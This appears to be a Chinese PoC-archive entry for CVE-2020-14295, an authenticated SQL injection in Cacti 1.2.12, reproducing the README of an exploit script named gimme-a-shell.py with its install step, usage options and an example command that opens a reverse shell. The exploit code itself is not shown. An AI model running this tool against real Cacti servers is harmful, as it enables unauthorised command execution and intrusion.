关联漏洞
标题:
Cacti SQL注入漏洞
(CVE-2020-14295)
描述:Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。 Cacti 1.2.12版本中的color.php文件存在SQL注入漏洞。远程攻击者可借助‘filter’参数利用该漏洞执行任意命令。
描述
Authenticated SQL injection to command execution on Cacti 1.2.12
介绍
# CVE-2020-14295
***
Vulnerability details - https://github.com/Cacti/cacti/issues/3622
## Install
`pip3 install -r requirements.txt`
## Usage
```
$ ./gimme-a-shell.py --help
usage: gimme-a-shell.py [-h] -t Target -U Username -P Password -i Shell-IP -p Shell-Port
optional arguments:
-h, --help show this help message and exit
required arguments:
-t Target Target URL
-U Username Cacti username
-P Password Cacti password
-i Shell-IP Reverse-Shell IP
-p Shell-Port Reverse-Shell Port
```
## Example
`./gimme-a-shell.py -t http://cacti.localhost -U admin -P admin -i 127.0.0.1 -p 9001`
文件快照
[4.0K] /data/pocs/b9eda427ce31b0f2b47675138286c2176f64848d
├── [3.9K] gimme-a-shell.py
├── [ 34K] LICENSE
├── [ 621] README.md
└── [ 8] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。